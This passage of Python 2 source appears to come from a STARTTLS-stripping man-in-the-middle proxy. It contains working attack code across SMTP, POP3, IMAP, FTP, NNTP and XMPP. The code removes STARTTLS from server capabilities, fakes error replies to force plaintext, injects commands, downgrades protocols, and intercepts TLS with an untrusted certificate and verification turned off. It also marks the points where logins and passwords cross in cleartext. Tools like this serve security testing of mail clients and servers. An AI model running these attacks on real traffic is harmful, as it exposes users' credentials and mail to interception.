sock:Session()\r\n self.callbacks = {} # name: [f,..]\r\n #\r\n self.listen = listen\r\n self.target = target\r\n #\r\n self.buffer_size = buffer_size\r\n self.delay = delay\r\n self.bind = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.bind.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\r\n self.bind.bind(listen)\r\n self.bind.listen(200)\r\n \r\n def __str__(self):\r\n return \"<Proxy %s listen=%s target=%s>\"%(hex(id(self)),self.listen, self.target)\r\n \r\n def get_session_by_client_sock(self, sock):\r\n return self.sessions.get(sock)\r\n \r\n def set_callback(self, name, f):\r\n self.callbacks[name] = f\r\n \r\n def main_loop(self):\r\n self.input_list.add(self.bind)\r\n while True:\r\n time.sleep(self.delay)\r\n inputready, _, _ = select.select(self.input_list, [], [])\r\n \r\n for sock in inputready:\r\n if not sock in self.input_list: \r\n # Check if inputready sock is still in the list of socks to read from\r\n # as SessionTerminateException might remove multiple sockets from that list\r\n # this might otherwise lead to bad FD access exceptions\r\n continue\r\n session = None\r\n try:\r\n if sock == self.bind:\r\n # on_accept\r\n session = Session(sock, target=self.target)\r\n for k,v in self.callbacks.iteritems():\r\n setattr(session, k, v)\r\n session.notify_read(sock)\r\n for s in session.get_peer_sockets():\r\n self.sessions[s]=session\r\n self.input_list.update(session.get_peer_sockets())\r\n else:\r\n # on_recv\r\n try:\r\n session = self.get_session_by_client_sock(sock)\r\n session.notify_read(sock)\r\n except ssl.SSLError, se:\r\n if se.errno != ssl.SSL_ERROR_WANT_READ:\r\n raise\r\n continue\r\n except SessionTerminatedException:\r\n self.input_list.difference_update(session.get_peer_sockets())\r\n logger.warning(\"%s terminated.\"%session)\r\n except Exception, e:\r\n logger.error(\"main: %s\"%repr(e))\r\n if isinstance(e,IOError):\r\n for kname,value in ((a,getattr(Vectors,a)) for a in dir(Vectors) if a.startswith(\"_TLS_\")):\r\n if not os.path.isfile(value):\r\n logger.error(\"%s = %s - file not found\"%(kname, repr(value)))\r\n if session:\r\n logger.error(\"main: removing all sockets associated with session that raised exception: %s\"%repr(session))\r\n try:\r\n session.close()\r\n except SessionTerminatedException: pass\r\n self.input_list.difference_update(session.get_peer_sockets())\r\n elif sock and sock!=self.bind:\r\n # exception for non-bind socket - probably fine to close and remove it from our list\r\n logger.error(\"main: removing socket that probably raised the exception\")\r\n sock.close()\r\n self.input_list.remove(sock)\r\n else:\r\n # this is just super-fatal - something happened while processing our bind socket.\r\n raise \r\n \r\nclass Vectors:\r\n _TLS_CERTFILE = \"server.pem\"\r\n _TLS_KEYFILE = \"server.pem\"\r\n \r\n class GENERIC:\r\n _PROTO_ID = None\r\n class Intercept:\r\n '''\r\n proto independent msg_peek based tls interception\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite): return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite): return data\r\n @staticmethod\r\n def on_recv_peek(session, s_in):\r\n if s_in.socket_ssl:\r\n return\r\n \r\n ssl_version = session.protocol.detect_peek_tls(s_in)\r\n if ssl_version:\r\n logger.info(\"SSL Handshake detected - performing ssl/tls conversion\")\r\n try:\r\n context = Vectors.GENERIC.Intercept.create_ssl_context()\r\n context.load_cert_chain(certfile=Vectors._TLS_CERTFILE,\r\n keyfile=Vectors._TLS_KEYFILE)\r\n session.inbound.ssl_wrap_socket_with_context(context, server_side=True)\r\n logger.debug(\"%s [client] <> [ ] SSL handshake done: %s\"%(session, session.inbound.socket_ssl.cipher()))\r\n session.outbound.ssl_wrap_socket_with_context(context, server_side=False)\r\n logger.debug(\"%s [ ] <> [server] SSL handshake done: %s\"%(session, session.outbound.socket_ssl.cipher()))\r\n except Exception, e:\r\n logger.warning(\"Exception - not ssl intercepting outbound: %s\"%repr(e))\r\n \r\n @staticmethod\r\n def create_ssl_context(proto=ssl.PROTOCOL_SSLv23, \r\n verify_mode=ssl.CERT_NONE,\r\n protocols=None,\r\n options=None,\r\n ciphers=\"ALL\"):\r\n protocols = protocols or ('PROTOCOL_SSLv3','PROTOCOL_TLSv1',\r\n 'PROTOCOL_TLSv1_1','PROTOCOL_TLSv1_2')\r\n options = options or ('OP_CIPHER_SERVER_PREFERENCE','OP_SINGLE_DH_USE',\r\n 'OP_SINGLE_ECDH_USE','OP_NO_COMPRESSION')\r\n context = ssl.SSLContext(proto)\r\n context.verify_mode = verify_mode\r\n # reset protocol, options\r\n context.protocol = 0\r\n context.options = 0\r\n for p in protocols:\r\n context.protocol |= getattr(ssl, p, 0)\r\n for o in options:\r\n context.options |= getattr(ssl, o, 0)\r\n context.set_ciphers(ciphers)\r\n return context\r\n \r\n class InboundIntercept:\r\n '''\r\n proto independent msg_peek based tls interception\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n # peek again - make sure to check for inbound ssl connections\r\n # before forwarding data to the inbound channel\r\n # just in case server is faster with answer than client with hello\r\n # likely if smtpd and striptls are running on the same segment\r\n # and client is not.\r\n if not session.inbound.socket_ssl:\r\n # only peek if inbound is not in tls mode yet\r\n # kind of a hack but allow additional 0.1 secs for the client\r\n # to send its hello\r\n time.sleep(0.1)\r\n Vectors.GENERIC.InterceptInbound.on_recv_peek(session, session.inbound)\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite): \r\n return data\r\n @staticmethod\r\n def on_recv_peek(session, s_in):\r\n if s_in.socket_ssl:\r\n return\r\n \r\n ssl_version = session.protocol.detect_peek_tls(s_in)\r\n if ssl_version:\r\n logger.info(\"SSL Handshake detected - performing ssl/tls conversion\")\r\n try:\r\n context = Vectors.GENERIC.Intercept.create_ssl_context()\r\n context.load_cert_chain(certfile=Vectors._TLS_CERTFILE,\r\n keyfile=Vectors._TLS_KEYFILE)\r\n session.inbound.ssl_wrap_socket_with_context(context, server_side=True)\r\n logger.debug(\"%s [client] <> [ ] SSL handshake done: %s\"%(session, session.inbound.socket_ssl.cipher()))\r\n except Exception, e:\r\n logger.warning(\"Exception - not ssl intercepting inbound: %s\"%repr(e))\r\n \r\n class SMTP:\r\n _PROTO_ID = 25\r\n class StripFromCapabilities:\r\n ''' 1) Force Server response to *NOT* announce STARTTLS support\r\n 2) raise exception if client tries to negotiated STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if any(e in session.outbound.sndbuf.lower() for e in ('ehlo','helo')) and \"250\" in data:\r\n features = [f for f in data.strip().split('\\r\\n') if not \"STARTTLS\" in f]\r\n if not features[-1].startswith(\"250 \"):\r\n features[-1] = features[-1].replace(\"250-\",\"250 \") # end marker\r\n data = '\\r\\n'.join(features)+'\\r\\n' \r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(data))\r\n elif \"mail from\" in data.lower():\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripWithInvalidResponseCode:\r\n ''' 1) Force Server response to contain STARTTLS even though it does not support it (just because we can)\r\n 2) Respond to client STARTTLS with invalid response code\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if any(e in session.outbound.sndbuf.lower() for e in ('ehlo','helo')) and \"250\" in data:\r\n features = list(data.strip().split(\"\\r\\n\"))\r\n features.insert(-1,\"250-STARTTLS\") # add STARTTLS from capabilities\r\n #if \"STARTTLS\" in data:\r\n # features = [f for f in features if not \"STARTTLS\" in f] # remove STARTTLS from capabilities\r\n data = '\\r\\n'.join(features)+'\\r\\n' \r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n session.inbound.sendall(\"200 STRIPTLS\\r\\n\")\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"200 STRIPTLS\\r\\n\")))\r\n data=None\r\n elif \"mail from\" in data.lower():\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripWithTemporaryError:\r\n ''' 1) force server error on client sending STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n session.inbound.sendall(\"454 TLS not available due to temporary reason\\r\\n\")\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"454 TLS not available due to temporary reason\\r\\n\")))\r\n data=None\r\n elif \"mail from\" in data.lower():\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripWithError:\r\n ''' 1) force server error on client sending STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n session.inbound.sendall(\"501 Syntax error\\r\\n\")\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"501 Syntax error\\r\\n\")))\r\n data=None\r\n elif \"mail from\" in data.lower():\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class UntrustedIntercept:\r\n ''' 1) Do not mangle server data\r\n 2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.\r\n in case client does not check keys\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n # do inbound STARTTLS\r\n session.inbound.sendall(\"220 Go ahead\\r\\n\")\r\n logger.debug(\"%s [client] <= [ ][mangled] %s\"%(session,repr(\"220 Go ahead\\r\\n\")))\r\n context = Vectors.GENERIC.Intercept.create_ssl_context()\r\n context.load_cert_chain(certfile=Vectors._TLS_CERTFILE, \r\n keyfile=Vectors._TLS_KEYFILE)\r\n logger.debug(\"%s [client] <= [ ][mangled] waiting for inbound SSL handshake\"%(session))\r\n session.inbound.ssl_wrap_socket_with_context(context, server_side=True)\r\n logger.debug(\"%s [client] <> [ ] SSL handshake done: %s\"%(session, session.inbound.socket_ssl.cipher()))\r\n \r\n # outbound ssl\r\n session.outbound.sendall(data)\r\n logger.debug(\"%s [ ] => [server][mangled] %s\"%(session,repr(data)))\r\n resp_data = session.outbound.recv_blocked()\r\n logger.debug(\"%s [ ] <= [server][mangled] %s\"%(session,repr(resp_data)))\r\n if \"220\" not in resp_data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(resp_data))\r\n logger.debug(\"%s [ ] => [server][mangled] performing outbound SSL handshake\"%(session))\r\n session.outbound.ssl_wrap_socket() \r\n logger.debug(\"%s [ ] <> [server] SSL handshake done: %s\"%(session, session.outbound.socket_ssl.cipher()))\r\n \r\n data=None\r\n elif \"mail from\" in data.lower():\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class InboundStarttlsProxy:\r\n ''' Inbound is starttls, outbound is plain\r\n 1) Do not mangle server data\r\n 2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.\r\n in case client does not check keys\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n # keep track of stripped server ehlo/helo\r\n if any(e in session.outbound.sndbuf.lower() for e in ('ehlo','helo')) and \"250\" in data and not session.datastore.get(\"server_ehlo_stripped\"): #only do this once\r\n # wait for full line\r\n while not \"250 \" in data:\r\n data+=session.outbound.recv_blocked()\r\n \r\n features = [f for f in data.strip().split('\\r\\n') if not \"STARTTLS\" in f]\r\n if features and not features[-1].startswith(\"250 \"):\r\n features[-1] = features[-1].replace(\"250-\",\"250 \") # end marker\r\n # force starttls announcement\r\n session.datastore['server_ehlo_stripped']= '\\r\\n'.join(features)+'\\r\\n' # stripped\r\n \r\n if len(features)>1:\r\n features.insert(-1,\"250-STARTTLS\")\r\n else:\r\n features.append(\"250 STARTTLS\")\r\n features[0]=features[0].replace(\"250 \",\"250-\")\r\n data = '\\r\\n'.join(features)+'\\r\\n' # forced starttls\r\n session.datastore['server_ehlo'] = data\r\n \r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n # do inbound STARTTLS\r\n session.inbound.sendall(\"220 Go ahead\\r\\n\")\r\n logger.debug(\"%s [client] <= [ ][mangled] %s\"%(session,repr(\"220 Go ahead\\r\\n\")))\r\n context = Vectors.GENERIC.Intercept.create_ssl_context()\r\n context.load_cert_chain(certfile=Vectors._TLS_CERTFILE,\r\n keyfile=Vectors._TLS_KEYFILE)\r\n logger.debug(\"%s [client] <= [ ][mangled] waiting for inbound SSL handshake\"%(session))\r\n session.inbound.ssl_wrap_socket_with_context(context, server_side=True)\r\n logger.debug(\"%s [client] <> [ ] SSL handshake done: %s\"%(session, session.inbound.socket_ssl.cipher()))\r\n # inbound ssl, fake server ehlo on helo/ehlo\r\n indata = session.inbound.recv_blocked()\r\n if not any(e in indata for e in ('ehlo','helo')):\r\n raise ProtocolViolationException(\"whoop!? client did not send EHLO/HELO after STARTTLS finished.. proto violation: %s\"%repr(indata))\r\n logger.debug(\"%s [client] => [ ][mangled] %s\"%(session,repr(indata)))\r\n session.inbound.sendall(session.datastore[\"server_ehlo_stripped\"])\r\n logger.debug(\"%s [client] <= [ ][mangled] %s\"%(session,repr(session.datastore[\"server_ehlo_stripped\"])))\r\n data=None\r\n elif any(e in data for e in ('ehlo','helo')) and session.datastore.get(\"server_ehlo_stripped\"):\r\n # just do not forward the second ehlo/helo\r\n data=None\r\n elif \"mail from\" in data.lower():\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class ProtocolDowngradeStripExtendedMode:\r\n ''' Return error on EHLO to force peer to non-extended mode\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if data.lower().startswith(\"ehlo \"):\r\n session.inbound.sendall(\"502 Error: command \\\"EHLO\\\" not implemented\\r\\n\")\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"502 Error: command \\\"EHLO\\\" not implemented\\r\\n\")))\r\n data=None\r\n elif \"mail from\" in data.lower():\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class InjectCommand:\r\n ''' 1) Append command to STARTTLS\\r\\n.\r\n 2) untrusted intercept to check if we get an invalid command response from server\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n data += \"INJECTED_INVALID_COMMAND\\r\\n\"\r\n #logger.debug(\"%s [client] => [server][mangled] %s\"%(session,repr(data)))\r\n try:\r\n Vectors.SMTP.UntrustedIntercept.mangle_client_data(session, data, rewrite)\r\n except ssl.SSLEOFError, se:\r\n logging.info(\"%s - Server failed to negotiate SSL with Exception: %s\"%(session, repr(se))) \r\n session.close()\r\n elif \"mail from\" in data.lower():\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class POP3:\r\n _PROTO_ID = 110\r\n \r\n class StripFromCapabilities:\r\n ''' 1) Force Server response to *NOT* announce STLS support\r\n 2) raise exception if client tries to negotiated STLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if data.lower().startswith('+ok capability'):\r\n features = [f for f in data.strip().split('\\r\\n') if not \"stls\" in f.lower()]\r\n data = '\\r\\n'.join(features)+'\\r\\n'\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if data.lower().startswith(\"stls\"):\r\n raise ProtocolViolationException(\"whoop!? client sent STLS even though we did not announce it.. proto violation: %s\"%repr(data))\r\n elif any(c in data.lower() for c in ('list','user ','pass ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripWithError:\r\n ''' 1) force server error on client sending STLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"stls\" == data.strip().lower():\r\n session.inbound.sendall(\"-ERR unknown command\\r\\n\")\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"-ERR unknown command\\r\\n\")))\r\n data=None\r\n elif any(c in data.lower() for c in ('list','user ','pass ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class UntrustedIntercept:\r\n ''' 1) Do not mangle server data\r\n 2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.\r\n in case client does not check keys\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"stls\"==data.strip().lower():\r\n # do inbound STARTTLS\r\n session.inbound.sendall(\"+OK Begin TLS negotiation\\r\\n\")\r\n logger.debug(\"%s [client] <= [ ][mangled] %s\"%(session,repr(\"+OK Begin TLS negotiation\\r\\n\")))\r\n context = Vectors.GENERIC.Intercept.create_ssl_context()\r\n context.load_cert_chain(certfile=Vectors._TLS_CERTFILE, \r\n keyfile=Vectors._TLS_CERTFILE)\r\n logger.debug(\"%s [client] <= [ ][mangled] waiting for inbound SSL handshake\"%(session))\r\n session.inbound.ssl_wrap_socket_with_context(context, server_side=True)\r\n logger.debug(\"%s [client] <> [ ] SSL handshake done: %s\"%(session, session.inbound.socket_ssl.cipher()))\r\n # outbound ssl\r\n \r\n session.outbound.sendall(data)\r\n logger.debug(\"%s [ ] => [server][mangled] %s\"%(session,repr(data)))\r\n resp_data = session.outbound.recv_blocked()\r\n logger.debug(\"%s [ ] <= [server][mangled] %s\"%(session,repr(resp_data)))\r\n if \"+OK\" not in resp_data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(resp_data))\r\n \r\n logger.debug(\"%s [ ] => [server][mangled] performing outbound SSL handshake\"%(session))\r\n session.outbound.ssl_wrap_socket()\r\n logger.debug(\"%s [ ] <> [server] SSL handshake done: %s\"%(session, session.outbound.socket_ssl.cipher()))\r\n \r\n data=None\r\n elif any(c in data.lower() for c in ('list','user ','pass ')):\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class IMAP:\r\n _PROTO_ID = 143\r\n class StripFromCapabilities:\r\n ''' 1) Force Server response to *NOT* announce STARTTLS support\r\n 2) raise exception if client tries to negotiated STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if \"CAPABILITY \" in data:\r\n # rfc2595\r\n data = data.replace(\" STARTTLS\",\"\").replace(\" LOGINDISABLED\",\"\")\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \" STARTTLS\" in data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(data))\r\n elif \" LOGIN \" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripWithError:\r\n ''' 1) force server error on client sending STLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if data.strip().lower().endswith(\"starttls\"):\r\n id = data.split(' ',1)[0].strip()\r\n session.inbound.sendall(\"%s BAD unknown command\\r\\n\"%id)\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"%s BAD unknown command\\r\\n\"%id)))\r\n data=None\r\n elif \" LOGIN \" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class ProtocolDowngradeToV2:\r\n ''' Return IMAP2 instead of IMAP4 in initial server response\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if all(kw.lower() in data.lower() for kw in (\"IMAP4\",\"* OK \")):\r\n session.inbound.sendall(\"OK IMAP2 Server Ready\\r\\n\")\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"OK IMAP2 Server Ready\\r\\n\")))\r\n data=None\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(data))\r\n elif \"mail from\" in data.lower():\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class UntrustedIntercept:\r\n ''' 1) Do not mangle server data\r\n 2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.\r\n in case client does not check keys\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if data.strip().lower().endswith(\"starttls\"):\r\n id = data.split(' ',1)[0].strip()\r\n # do inbound STARTTLS\r\n session.inbound.sendall(\"%s OK Begin TLS negotation now\\r\\n\"%id)\r\n logger.debug(\"%s [client] <= [ ][mangled] %s\"%(session,repr(\"%s OK Begin TLS negotation now\\r\\n\"%id)))\r\n context = Vectors.GENERIC.Intercept.create_ssl_context()\r\n context.load_cert_chain(certfile=Vectors._TLS_CERTFILE, \r\n keyfile=Vectors._TLS_CERTFILE)\r\n logger.debug(\"%s [client] <= [ ][mangled] waiting for inbound SSL handshake\"%(session))\r\n session.inbound.ssl_wrap_socket_with_context(context, server_side=True)\r\n logger.debug(\"%s [client] <> [ ] SSL handshake done: %s\"%(session, session.inbound.socket_ssl.cipher()))\r\n \r\n # outbound ssl\r\n \r\n session.outbound.sendall(data)\r\n logger.debug(\"%s [ ] => [server][mangled] %s\"%(session,repr(data)))\r\n resp_data = session.outbound.recv_blocked()\r\n logger.debug(\"%s [ ] <= [server][mangled] %s\"%(session,repr(resp_data)))\r\n if \"%s OK\"%id not in resp_data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(resp_data))\r\n \r\n logger.debug(\"%s [ ] => [server][mangled] performing outbound SSL handshake\"%(session))\r\n session.outbound.ssl_wrap_socket()\r\n logger.debug(\"%s [ ] <> [server] SSL handshake done: %s\"%(session, session.outbound.socket_ssl.cipher()))\r\n \r\n data=None\r\n elif \" LOGIN \" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class FTP:\r\n _PROTO_ID = 21\r\n class StripFromCapabilities:\r\n ''' 1) Force Server response to *NOT* announce AUTH TLS support\r\n 2) raise exception if client tries to negotiated AUTH TLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if session.outbound.sndbuf.strip().lower()==\"feat\" \\\r\n and \"AUTH TLS\" in data:\r\n features = (f for f in data.strip().split('\\n') if not \"AUTH TLS\" in f)\r\n data = '\\n'.join(features)+\"\\r\\n\"\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"AUTH TLS\" in data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(data))\r\n elif \"USER \" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripWithError:\r\n ''' 1) force server error on client sending AUTH TLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"AUTH TLS\" in data:\r\n session.inbound.sendall(\"500 AUTH TLS not understood\\r\\n\")\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"500 AUTH TLS not understood\\r\\n\")))\r\n data=None\r\n elif \"USER \" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class UntrustedIntercept:\r\n ''' 1) Do not mangle server data\r\n 2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.\r\n in case client does not check keys\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"AUTH TLS\" in data:\r\n # do inbound STARTTLS\r\n session.inbound.sendall(\"234 OK Begin TLS negotation now\\r\\n\")\r\n logger.debug(\"%s [client] <= [ ][mangled] %s\"%(session,repr(\"234 OK Begin TLS negotation now\\r\\n\")))\r\n context = Vectors.GENERIC.Intercept.create_ssl_context()\r\n context.load_cert_chain(certfile=Vectors._TLS_CERTFILE, \r\n keyfile=Vectors._TLS_KEYFILE)\r\n logger.debug(\"%s [client] <= [ ][mangled] waiting for inbound SSL handshake\"%(session))\r\n session.inbound.ssl_wrap_socket_with_context(context, server_side=True)\r\n logger.debug(\"%s [client] <> [ ] SSL handshake done: %s\"%(session, session.inbound.socket_ssl.cipher()))\r\n # outbound ssl\r\n \r\n session.outbound.sendall(data)\r\n logger.debug(\"%s [ ] => [server][mangled] %s\"%(session,repr(data)))\r\n resp_data = session.outbound.recv_blocked()\r\n logger.debug(\"%s [ ] <= [server][mangled] %s\"%(session,repr(resp_data)))\r\n if not resp_data.startswith(\"234\"):\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(resp_data))\r\n \r\n logger.debug(\"%s [ ] => [server][mangled] performing outbound SSL handshake\"%(session))\r\n session.outbound.ssl_wrap_socket()\r\n logger.debug(\"%s [ ] <> [server] SSL handshake done: %s\"%(session, session.outbound.socket_ssl.cipher()))\r\n \r\n data=None\r\n elif \"USER \" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class NNTP:\r\n _PROTO_ID = 119\r\n class StripFromCapabilities:\r\n ''' 1) Force Server response to *NOT* announce STARTTLS support\r\n 2) raise exception if client tries to negotiated STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if session.outbound.sndbuf.strip().lower()==\"capabilities\" \\\r\n and \"STARTTLS\" in data:\r\n features = (f for f in data.strip().split('\\n') if not \"STARTTLS\" in f)\r\n data = '\\n'.join(features)+\"\\r\\n\"\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(data))\r\n elif \"GROUP \" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class StripWithError:\r\n ''' 1) force server error on client sending STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n session.inbound.sendall(\"502 Command unavailable\\r\\n\") # or 580 Can not initiate TLS negotiation\r\n logger.debug(\"%s [client] <= [server][mangled] %s\"%(session,repr(\"502 Command unavailable\\r\\n\")))\r\n data=None\r\n elif \"GROUP \" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class UntrustedIntercept:\r\n ''' 1) Do not mangle server data\r\n 2) intercept client STARTLS, negotiated ssl_context with client and one with server, untrusted.\r\n in case client does not check keys\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"STARTTLS\" in data:\r\n # do inbound STARTTLS\r\n session.inbound.sendall(\"382 Continue with TLS negotiation\\r\\n\")\r\n logger.debug(\"%s [client] <= [ ][mangled] %s\"%(session,repr(\"382 Continue with TLS negotiation\\r\\n\")))\r\n context = Vectors.GENERIC.Intercept.create_ssl_context()\r\n context.load_cert_chain(certfile=Vectors._TLS_CERTFILE, \r\n keyfile=Vectors._TLS_KEYFILE)\r\n logger.debug(\"%s [client] <= [ ][mangled] waiting for inbound SSL handshake\"%(session))\r\n session.inbound.ssl_wrap_socket_with_context(context, server_side=True)\r\n logger.debug(\"%s [client] <> [ ] SSL handshake done: %s\"%(session, session.inbound.socket_ssl.cipher()))\r\n # outbound ssl\r\n \r\n session.outbound.sendall(data)\r\n logger.debug(\"%s [ ] => [server][mangled] %s\"%(session,repr(data)))\r\n resp_data = session.outbound.recv_blocked()\r\n logger.debug(\"%s [ ] <= [server][mangled] %s\"%(session,repr(resp_data)))\r\n if not resp_data.startswith(\"382\"):\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(resp_data))\r\n \r\n logger.debug(\"%s [ ] => [server][mangled] performing outbound SSL handshake\"%(session))\r\n session.outbound.ssl_wrap_socket()\r\n logger.debug(\"%s [ ] <> [server] SSL handshake done: %s\"%(session, session.outbound.socket_ssl.cipher()))\r\n \r\n data=None\r\n elif \"GROUP \" in data:\r\n rewrite.set_result(session, True)\r\n return data\r\n \r\n class XMPP:\r\n _PROTO_ID = 5222\r\n class StripFromCapabilities:\r\n ''' 1) Force Server response to *NOT* announce STARTTLS support\r\n 2) raise exception if client tries to negotiated STARTTLS\r\n '''\r\n @staticmethod\r\n def mangle_server_data(session, data, rewrite):\r\n if \"<starttls\" in data:\r\n start = data.index(\"<starttls\")\r\n end = data.index(\"</starttls>\",start)+len(\"</starttls>\")\r\n data = data[:start] + data[end:] # strip starttls from capabilities\r\n return data\r\n @staticmethod\r\n def mangle_client_data(session, data, rewrite):\r\n if \"<starttls\" in data:\r\n # do not respond with <proceed xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\r\n #<failure/> or <proceed/>\r\n raise ProtocolViolationException(\"whoop!? client sent STARTTLS even though we did not announce it.. proto violation: %s\"%repr(data))\r\n #session.inbound.sendall(\"<success xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>\") # fake respone\r\n #data=None\r\n elif any(c in data.lower() for c in (\"</auth>\",\"<query\",\"<iq\",\"<username\")):\r\n rewrite.set_result(session, True)\r\n return data \r\n \r\n class StripInboundTLS:\r\n ''' 1) Force Server response to *NOT* announce STARTTLS support\r\n 2) If starttls is required outbound, leave inbound connection plain - outbound 